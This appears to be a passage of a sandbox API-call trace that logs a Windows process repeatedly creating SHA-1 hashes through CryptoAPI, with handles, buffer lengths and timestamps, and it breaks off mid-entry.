1 [0086.035] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.035] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.036] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.036] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0086.036] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.036] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.036] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.036] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0086.036] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.036] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.036] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.036] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0086.036] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.036] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.036] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.036] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x90, dwFlags=0x0) returned 1 [0086.036] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.036] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.036] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.036] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.036] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.036] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.036] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.036] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.036] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.036] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.036] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.036] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xf8, dwFlags=0x0) returned 1 [0086.036] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.036] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.036] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.036] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xfa, dwFlags=0x0) returned 1 [0086.036] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.036] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.037] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.037] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x72, dwFlags=0x0) returned 1 [0086.037] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.037] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.037] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.037] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x74, dwFlags=0x0) returned 1 [0086.037] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.037] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.037] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.037] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x88, dwFlags=0x0) returned 1 [0086.037] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.037] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.037] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.037] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.037] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.037] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.037] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.037] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb0, dwFlags=0x0) returned 1 [0086.037] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.037] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.037] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.037] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xb2, dwFlags=0x0) returned 1 [0086.037] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.037] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.037] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.037] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xce, dwFlags=0x0) returned 1 [0086.037] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.037] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.037] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.037] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd0, dwFlags=0x0) returned 1 [0086.037] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.037] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.037] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.038] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x92, dwFlags=0x0) returned 1 [0086.038] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.038] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.038] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.038] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x94, dwFlags=0x0) returned 1 [0086.038] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.038] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.038] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.038] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.038] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.038] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.038] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.038] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.038] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.038] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.038] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.038] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.038] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.038] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.038] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.038] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.038] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.038] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.038] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.038] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xba, dwFlags=0x0) returned 1 [0086.038] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.038] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.038] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.038] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xbc, dwFlags=0x0) returned 1 [0086.038] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.038] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.038] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.039] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.039] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.039] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.039] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.039] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.039] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.039] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.039] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.039] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd6, dwFlags=0x0) returned 1 [0086.039] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.039] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.039] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.039] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd8, dwFlags=0x0) returned 1 [0086.039] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.039] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.039] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.039] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x86, dwFlags=0x0) returned 1 [0086.039] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.039] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.039] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.039] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x88, dwFlags=0x0) returned 1 [0086.039] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.039] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.039] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.039] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x76, dwFlags=0x0) returned 1 [0086.039] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.039] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.039] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.039] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x78, dwFlags=0x0) returned 1 [0086.039] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.039] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.039] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.040] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x72, dwFlags=0x0) returned 1 [0086.040] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.040] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.040] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.040] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x74, dwFlags=0x0) returned 1 [0086.040] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.040] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.040] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.040] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x90, dwFlags=0x0) returned 1 [0086.040] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.040] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.040] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.040] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x92, dwFlags=0x0) returned 1 [0086.040] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.040] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.040] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.040] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xba, dwFlags=0x0) returned 1 [0086.040] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.040] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.040] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.040] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xbc, dwFlags=0x0) returned 1 [0086.040] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.040] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.040] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.040] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.040] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.040] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.040] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.040] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0086.040] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.040] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.040] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.041] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x72, dwFlags=0x0) returned 1 [0086.041] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.041] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.041] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.041] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x74, dwFlags=0x0) returned 1 [0086.041] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.041] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.041] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.041] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x76, dwFlags=0x0) returned 1 [0086.041] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.041] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.041] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.041] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x78, dwFlags=0x0) returned 1 [0086.041] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.041] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.041] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.041] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.041] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.041] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.041] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.041] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0086.041] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.041] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.041] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.041] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd0, dwFlags=0x0) returned 1 [0086.041] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.041] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.041] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.041] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd2, dwFlags=0x0) returned 1 [0086.041] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.041] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.041] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.041] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.042] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.042] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.042] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.042] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.042] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.042] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.042] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.042] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x98, dwFlags=0x0) returned 1 [0086.042] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.042] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.042] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.042] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9a, dwFlags=0x0) returned 1 [0086.042] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.042] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.042] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.042] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.042] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.042] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.042] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.042] CryptHashData 